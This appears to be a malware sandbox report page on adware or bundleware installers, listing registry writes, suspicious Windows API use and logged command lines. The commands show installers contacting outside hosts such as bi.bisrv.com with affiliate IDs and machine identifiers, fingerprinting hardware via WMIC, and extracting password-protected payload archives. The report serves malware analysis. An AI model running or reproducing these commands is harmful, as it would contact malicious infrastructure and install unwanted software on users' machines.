HKLM\system\controlset001\control\session manager::pendingfilerenameoperations \??\C:\Windows\SystemTemp\77e37ce0-8214-4414-aced-551c5ae204d7.tmp\??\C:\Windows\SystemTemp\e28eadcf-6ab0-4d8c-8821-7ce9a6aba1 RegNtPreCreateKey
HKLM\system\controlset001\control\session manager::pendingfilerenameoperations *1\??\C:\sandbox_live\tmp\111818\4884\c\users\user\appdata\local\temp\biclient.exe RegNtPreCreateKey
HKLM\system\controlset001\control\session manager::pendingfilerenameoperations *1\??\C:\sandbox_live\tmp\111909\7588\c\users\user\appdata\local\temp\biclient.exe RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe ᔟ쓚申ǜ RegNtPreCreateKey
HKLM\system\controlset001\control\session manager::pendingfilerenameoperations *1\??\C:\Windows\SystemTemp\MicrosoftEdgeUpdate.exe.old122e4*1\??\C:\Windows\SystemTemp\CopilotUpdate.exe.old12352*1\??\C:\P RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 㴘揿睘ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 洍诠筈ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 䜻ც箄ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe ﻫ萴艦ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 엂篺郇ǜ RegNtPreCreateKey

Windows API Usage

Category API
Process Manipulation Evasion
  • NtUnmapViewOfSection
Process Shell Execute
  • CreateProcess
  • ShellExecute
  • WriteConsole
User Data Access
  • GetUserName
  • GetUserObjectInformation
Encryption Used
  • BCryptOpenAlgorithmProvider
  • CryptAcquireContext
Syscall Use
  • ntdll.dll!NtAccessCheck
  • ntdll.dll!NtAddAtomEx
  • ntdll.dll!NtAlertThreadByThreadId
  • ntdll.dll!NtAlpcSendWaitReceivePort
  • ntdll.dll!NtApphelpCacheControl
  • ntdll.dll!NtClearEvent
  • ntdll.dll!NtClose
  • ntdll.dll!NtConnectPort
  • ntdll.dll!NtCreateEvent
  • ntdll.dll!NtCreateFile
Show More
  • ntdll.dll!NtCreateMutant
  • ntdll.dll!NtCreateSection
  • ntdll.dll!NtCreateSemaphore
  • ntdll.dll!NtDuplicateObject
  • ntdll.dll!NtDuplicateToken
  • ntdll.dll!NtEnumerateKey
  • ntdll.dll!NtEnumerateValueKey
  • ntdll.dll!NtFreeVirtualMemory
  • ntdll.dll!NtMapViewOfSection
  • ntdll.dll!NtOpenFile
  • ntdll.dll!NtOpenKey
  • ntdll.dll!NtOpenKeyEx
  • ntdll.dll!NtOpenProcessToken
  • ntdll.dll!NtOpenProcessTokenEx
  • ntdll.dll!NtOpenSection
  • ntdll.dll!NtOpenSemaphore
  • ntdll.dll!NtOpenThreadTokenEx
  • ntdll.dll!NtProtectVirtualMemory
  • ntdll.dll!NtQueryAttributesFile
  • ntdll.dll!NtQueryInformationFile
  • ntdll.dll!NtQueryInformationProcess
  • ntdll.dll!NtQueryInformationThread
  • ntdll.dll!NtQueryInformationToken
  • ntdll.dll!NtQueryKey
  • ntdll.dll!NtQueryLicenseValue
  • ntdll.dll!NtQueryPerformanceCounter
  • ntdll.dll!NtQuerySecurityAttributesToken
  • ntdll.dll!NtQueryValueKey
  • ntdll.dll!NtQueryVirtualMemory
  • ntdll.dll!NtQueryVolumeInformationFile
  • ntdll.dll!NtQueryWnfStateData
  • ntdll.dll!NtReadFile
  • ntdll.dll!NtReleaseMutant
  • ntdll.dll!NtReleaseSemaphore
  • ntdll.dll!NtReleaseWorkerFactoryWorker
  • ntdll.dll!NtRequestWaitReplyPort
  • ntdll.dll!NtSetEvent
  • ntdll.dll!NtSetInformationKey
  • ntdll.dll!NtSetInformationProcess
  • ntdll.dll!NtSetInformationVirtualMemory
  • ntdll.dll!NtSetInformationWorkerFactory
  • ntdll.dll!NtSubscribeWnfStateChange
  • ntdll.dll!NtTestAlert
  • ntdll.dll!NtTraceControl
  • ntdll.dll!NtUnmapViewOfSection
  • ntdll.dll!NtUnmapViewOfSectionEx
  • ntdll.dll!NtWaitForAlertByThreadId
  • ntdll.dll!NtWaitForSingleObject
  • ntdll.dll!NtWaitForWorkViaWorkerFactory
  • ntdll.dll!NtWaitLowEventPair
  • ntdll.dll!NtWorkerFactoryWorkerReady
  • ntdll.dll!NtWriteFile
  • ntdll.dll!NtWriteVirtualMemory
  • UNKNOWN
  • win32u.dll!NtGdiAnyLinkedFonts
  • win32u.dll!NtGdiBitBlt
  • win32u.dll!NtGdiCreateBitmap
  • win32u.dll!NtGdiCreateCompatibleBitmap
  • win32u.dll!NtGdiCreateCompatibleDC
  • win32u.dll!NtGdiCreateDIBitmapInternal
  • win32u.dll!NtGdiCreateRectRgn
  • win32u.dll!NtGdiCreateSolidBrush
  • win32u.dll!NtGdiDeleteObjectApp
  • win32u.dll!NtGdiDoPalette
  • win32u.dll!NtGdiDrawStream
  • win32u.dll!NtGdiExtGetObjectW
  • win32u.dll!NtGdiExtTextOutW
  • win32u.dll!NtGdiFontIsLinked
  • win32u.dll!NtGdiGetCharABCWidthsW
  • win32u.dll!NtGdiGetDCDword
  • win32u.dll!NtGdiGetDCObject
  • win32u.dll!NtGdiGetDeviceCaps
  • win32u.dll!NtGdiGetDIBitsInternal
  • win32u.dll!NtGdiGetEntry
  • win32u.dll!NtGdiGetFontData
  • win32u.dll!NtGdiGetGlyphIndicesW
  • win32u.dll!NtGdiGetOutlineTextMetricsInternalW
  • win32u.dll!NtGdiGetRandomRgn
  • win32u.dll!NtGdiGetRealizationInfo
  • win32u.dll!NtGdiGetTextFaceW
  • win32u.dll!NtGdiGetTextMetricsW
  • win32u.dll!NtGdiGetWidthTable
  • win32u.dll!NtGdiHfontCreate
  • win32u.dll!NtGdiIntersectClipRect
  • win32u.dll!NtGdiQueryFontAssocInfo
  • win32u.dll!NtGdiSelectBitmap
  • win32u.dll!NtGdiSetLayout
  • win32u.dll!NtGdiStretchDIBitsInternal
  • win32u.dll!NtUserBeginPaint
  • win32u.dll!NtUserBuildHwndList

58 additional items are not displayed above.

Anti Debug
  • IsDebuggerPresent
Process Terminate
  • TerminateProcess
Network Wininet
  • HttpOpenRequest
  • HttpQueryInfo
  • HttpSendRequest
  • InternetConnect
  • InternetOpen
  • InternetQueryOption
  • InternetReadFile
  • InternetSetOption
Other Suspicious
  • AdjustTokenPrivileges
Network Info Queried
  • GetAdaptersInfo

Shell Command Execution

"C:\Users\Uawsxdls\AppData\Local\Temp\is-8A7VU.tmp\97763e6a25238b6096fe4850b26c199af0266e91_0004783892.tmp" /SL5="$40216,4295122,153600,c:\users\user\downloads\97763e6a25238b6096fe4850b26c199af0266e91_0004783892.exe"
"C:\Users\Jerbuoiw\AppData\Local\Temp\biclient.exe" /url bi.bisrv.com /affid "awfr7zip19788" /id "7zip" /name "7-Zip" /browser ff
WMIC csproduct Get UUID /FORMAT:textvaluelist.xsl
WMIC bios Get SerialNumber /FORMAT:textvaluelist.xsl
WMIC bios Get Version /FORMAT:textvaluelist.xsl
Show More
WMIC csproduct Get Name /FORMAT:textvaluelist.xsl
7za.exe e -y -p"cc16e12b7c77b8f1fd959c415ad6f1e7" [RANDOM_STRING].7z
"C:\Users\Tvkaelgj\AppData\Local\Temp\is-70TM1.tmp\741cd1617ca732a9557aae6adc94b09ed834a528_0002369795.tmp" /SL5="$20146,2038800,132096,c:\users\user\downloads\741cd1617ca732a9557aae6adc94b09ed834a528_0002369795"
7za.exe e -y -p"e5584e65b7e50868783c408054621eb6" [RANDOM_STRING].7z
"C:\Users\Jkquqjyg\AppData\Local\Temp\biclient.exe" /initurl http://bi.bisrv.com/:affid:/:sid:/:uid:? /affid "oneonlinegames" /id "f1pinballzipjkdw" /name "f1-pinball.zip" /uniqid 772f121128a1196fb3a0902685bd2c3ce977df47_0000163528
7za.exe e -y -p"439603f41bcb401021ee148cf7769f1c" [RANDOM_STRING].7z
"C:\Users\Kkegjcwd\AppData\Local\Temp\nseC05D.tmp\setupcl.exe" /initurl http://sub.ginaul.info/init/7e967b2ac7d5c358275ada39ad23d5cb9aa4337c_0000413264/:uid:? /affid "-" /id "0" /name " " /uniqid 7e967b2ac7d5c358275ada39ad23d5cb9aa4337c_0000413264 /uuid /biosserial /biosversion /csname
"C:\Users\Unenjolo\AppData\Local\Temp\biclient.exe" /url bi.bisrv.com /affid "awplfreezip71908" /id "freezipuyiv" /name "Free Zip" /uniqid 1daefe7b77508ca24e22f2062d1765842b47ae93_0000166600 /browser ff
7za.exe e -y -p"f412f82a5f1cd93b46abdabe00ecb510" [RANDOM_STRING].7z
7za.exe e -y -p"2eab8c80e8a5782cfccc9f26bea533a9" [RANDOM_STRING].7z
"C:\Users\Mdoonnlr\AppData\Local\Temp\nshE9C1.tmp\lzma.exe" "d" "C:\Users\Mdoonnlr\AppData\Local\Temp\nshE9C1.tmp\bqeu1pj52d9pqz6f5p" "C:\Users\Mdoonnlr\AppData\Local\Temp\nshE9C1.tmp\biSetup56841.exe"
7za.exe e -y -p"3e17b05abcee4f17c87b1ff4058e061b" [RANDOM_STRING].7z
7za.exe e -y -p"be1bf6fa5de8fb8fcca12a9d66238c22" [RANDOM_STRING].7z
"C:\Users\Igxtfuqp\AppData\Local\Temp\~nsu.tmp\Au_.exe" _?=c:\users\user\downloads\
"c:\users\user\downloads\update_checker.exe" /disable
C:\WINDOWS\system32\regsvr32 -u /s "c:\users\user\downloads\tbcore3.dll"
open C:\WINDOWS\system32\taskkill /F /IM TbHelper2.exe
WriteConsole: ERROR: The proce
"C:\Users\Xauudzeq\AppData\Local\Temp\biclient.exe" /initurl http://bi.bisrv.com/:affid:/:sid:/:uid:? /affid "network_web3_1" /id "flvplayerorun" /name "FLV Player" /uniqid 84bad32c6b44369739fee95c09f5c65bb406abe0_0000165736
"C:\Users\Xnhonaci\AppData\Local\Temp\biclient.exe" /url bi.bisrv.com /affid "piratebaymirror" /id "adobephotoshopcs5fulltuto" /name "Adobe Photoshop CS5 Full Tuto" /uniqid 9f51722877b52840ca94e6385edf5cdf576d7239_0000166648
7za.exe e -y -p"e32e41ab4100dbfa381c34147d218c32" [RANDOM_STRING].7z
"C:\Users\Usjjhwgd\AppData\Local\Temp\nso7EF5.tmp\setupcl.exe" /initurl http://sub.ineedyoutoseewhoiam.com/init/57b18ebf961237cdb8c2e83895933513c519f5be_0000413376/:uid:? /affid "-" /id "0" /name " " /uniqid 57b18ebf961237cdb8c2e83895933513c519f5be_0000413376 /uuid /biosserial /biosversion /csname
7za.exe e -y -p"a6533e0c496d1dc546a4a166550a9e78" [RANDOM_STRING].7z
7za.exe e -y -p"8356858b5b8c00899259b2bdb8738dae" [RANDOM_STRING].7z
Fri594.exe -y -p"60c232487ce10dfdc24e885155224a99"
"C:\Users\Veduunjr\AppData\Local\Temp\nscA833.tmp\setupcl.exe" /initurl http://sub.hereon.info/init/11575c9383a99e48641bd823ab8012c5fb80d281_0000225432/:uid:? /affid "-" /id "0" /name " " /uniqid 11575c9383a99e48641bd823ab8012c5fb80d281_0000225432 /uuid /biosserial /biosversion /csname
7za.exe e -y -p"6710f9307edc7adad3dcdf8476078f55" [RANDOM_STRING].7z
"C:\Users\Yxdhyzeq\AppData\Local\Temp\nstC222.tmp\setupcl.exe" /initurl http://sub.rhionx.info/init/70d1d67c1f0a2d5a120eb07a3bc16cfd3efd178e_0000413304/:uid:? /affid "-" /id "0" /name " " /uniqid 70d1d67c1f0a2d5a120eb07a3bc16cfd3efd178e_0000413304 /uuid /biosserial /biosversion /csname
wmic bios get serialnumber
7za.exe e -y -p"61c3811f51c7ef2cca3cfa2e6437e545" [RANDOM_STRING].7z

Related Posts

Trending

Most Viewed

Loading...